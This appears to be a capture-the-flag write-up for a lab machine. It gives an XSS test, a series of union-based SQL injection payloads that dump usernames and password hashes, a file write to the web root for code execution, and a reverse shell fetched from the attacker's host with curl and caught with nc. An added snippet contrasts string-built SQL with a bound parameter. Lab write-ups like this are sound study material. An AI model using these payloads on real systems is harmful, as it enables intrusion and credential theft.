ENUMERATION
NMAP
Port 80
Port 4566
Port 8080
I enumerate Port 80:
First Attack Vectors
The index page of this website is a form to qualify for something called September UHC; let's try to inject SQL, XSS, HTML and more.
XSS
Payload: <script>alert("SS")</script>
It's vulnerable to XSS and HTML injection, but I can't do anything.
SQLI
BurpSuite
Payload: ' order by 10000-- - == DOESN'T WORK
Payload: ' union select 1-- - == DOESN'T WORK
Country Field
Let's try these payloads with another field from the request.
Payload: ' union select 1-- - == WORKS!!!!!
Let's go enumerate things.
Database
Payload: ' union select database()-- -
Version
Payload: ' union select @@version-- -
All DataBases
Payload: ' union select schema_name from information_schema.schemata
Tables Registration Database
Payload: ' union select table_name from information_schema.tables where table_schema="registration"-- -
The table name is the same as the database name.
Columns
Payload: ' union select column_name from information_schema.columns where table_schema="registration" and table_name="registration"-- -
Users and Passwords
Payload: ' union select group_concat(username,0x3a,userhash) from registration-- -
These users are my users...
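Why the Country field was injectable and how the form should have been written, as an added example that is not part of the original writeup: a hypothetical lookup that interpolates the field into the query next to the same lookup with a bound parameter, run against a constructed SQLite stand-in for the box's MySQL "registration" table (table and column names from the writeup, rows invented) with the writeup's own union payload.

```python
import sqlite3

# Constructed stand-in for the box's "registration" database.
# SQLite replaces MySQL here; the union technique is the same.
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
CREATE TABLE registration (username TEXT, userhash TEXT, country TEXT);
INSERT INTO registration VALUES ('alice', 'hash-alice', 'Spain');
INSERT INTO registration VALUES ('bob',   'hash-bob',   'Chile');
""")


def lookup_vulnerable(country):
    # Hypothetical form handler: the Country field is pasted into the
    # SQL text, so a quote closes the literal and the rest becomes SQL.
    sql = "SELECT username FROM registration WHERE country = '%s'" % country
    return [row[0] for row in CONN.execute(sql)]


def lookup_safe(country):
    # Same lookup with a bound parameter: the driver sends the value
    # separately from the statement, so it can never change the query.
    sql = "SELECT username FROM registration WHERE country = ?"
    return [row[0] for row in CONN.execute(sql, (country,))]


# The writeup's union payload, pulling the hash column through the
# single-column SELECT (one column, so "union select 1" lined up).
PAYLOAD = "' union select userhash from registration-- -"

if __name__ == "__main__":
    print("vulnerable:", lookup_vulnerable(PAYLOAD))  # leaks every userhash
    print("safe:      ", lookup_safe(PAYLOAD))        # no row has that country
```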
RCE
Payload: ' union select "" into outfile "/var/www/html/rce.php"-- -
Works!!
Reverse Shell
I create a PHP script on my Kali machine to gain a reverse shell.
I open an HTTP server with python3: python3 -m http.server
In victim RCE: curl -o shell.php 10.10.14.33:8000/shell.php
Now I run rlwrap nc -lnvp 1212
I access: http://10.10.11.116/shell.php
I HAVE SHELL!!
user.txt
Docker Container
I'm in a Docker container, but I found credentials in /var/www/html/config.php
SSH DOESN'T WORK
su root is working
DONE :)
Thanks